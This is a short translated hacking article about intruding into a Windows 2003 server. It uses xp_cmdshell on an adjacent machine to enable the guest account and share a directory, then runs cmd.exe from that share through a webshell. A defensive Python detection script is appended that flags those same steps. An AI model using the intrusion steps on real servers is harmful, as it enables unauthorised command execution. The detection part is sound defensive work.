Clever use of file sharing in a WEBSHELL to execute system commands

ID MYHACK58:6220067798
Type myhack58
Reporter Anonymous
Modified 2006-03-10T00:00:00


Article author: pt007 (article is very concise, but make it so difficult

Recently, while intruding into a Win2003 machine, I found that by default the cmd.exe that ships with the system could not be used to execute system commands, and uploading a cmd.exe file failed because the file was too large. I then successfully uploaded the cmd.exe file through a file share on a machine adjacent to the site. The specific process is as follows. We have already acquired privileges on the adjacent machine, so we use SQL's xp_cmdshell command to execute the following operations:

net user guest /active:yes
(enables the guest user so that the file share allows anonymous access)

net share web=d:\web
(shares the WEB directory)

Then, in the WEBSHELL on the target machine, enter the following in the shell path field: \\\web\cmd.exe

Finally, with the SHELL path in the figure set to the cmd.exe in c:\, system commands execute normally.

Since cmd.exe can be uploaded to the server as a packaged archive, I suggest that an expert write an ASP-based RAR decompression tool to make it easy to upload the cmd.exe program to servers running 2003.
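Seen from the defending side, each step above leaves a process-creation trace: the guest account being enabled, a share being created, and an executable launched from a UNC path by a service process. The following detection sketch is an added example, not part of the original article; the field names are modeled on Sysmon process-creation events, and the sample events, the FILESRV host name and the rule names are constructed assumptions.

```python
import re
from ntpath import basename

# Parents that rarely have a reason to spawn these commands: SQL Server
# (xp_cmdshell) and the IIS worker process hosting ASP pages (assumed set).
SERVICE_PARENTS = {"sqlservr.exe", "w3wp.exe"}
GUEST_ON = re.compile(r'\bnet1?(\.exe)?"?\s+user\s+guest\b.*/active:yes', re.I)
SHARE_ADD = re.compile(r'\bnet1?(\.exe)?"?\s+share\s+[^\s=]+=\S', re.I)

def is_unc_image(path):
    """True when the executable was loaded from a network share."""
    p = path.strip('"')
    if p.upper().startswith("\\\\?\\UNC\\"):
        return True
    # \\?\C:\... and \\.\... are local device paths, not shares
    return p.startswith("\\\\") and not p.startswith(("\\\\?\\", "\\\\.\\"))

def findings(event):
    """Return the names of the rules that a process-creation event triggers."""
    hits = []
    cmd = event.get("CommandLine", "")
    if GUEST_ON.search(cmd):
        hits.append("guest_account_enabled")
    if SHARE_ADD.search(cmd):
        hits.append("share_created")
    if is_unc_image(event.get("Image", "")):
        hits.append("image_from_unc_path")
    if hits and basename(event.get("ParentImage", "")).lower() in SERVICE_PARENTS:
        hits.append("spawned_by_service")
    return hits

# Constructed sample events; FILESRV is a placeholder host name.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": "cmd.exe /c net user guest /active:yes"},
    {"ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "Image": r"C:\WINDOWS\system32\net.exe",
     "CommandLine": r"net share web=d:\web"},
    {"ParentImage": r"c:\windows\system32\inetsrv\w3wp.exe",
     "Image": r"\\FILESRV\web\cmd.exe",
     "CommandLine": r"\\FILESRV\web\cmd.exe /c whoami"},
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"\\?\C:\Tools\report.exe",
     "CommandLine": "report.exe"},
]

for ev in SAMPLE_EVENTS:
    print(findings(ev), ev["CommandLine"])
```

The last sample is a local `\\?\` device path and is deliberately not flagged, since only executables loaded from a share match the UNC rule.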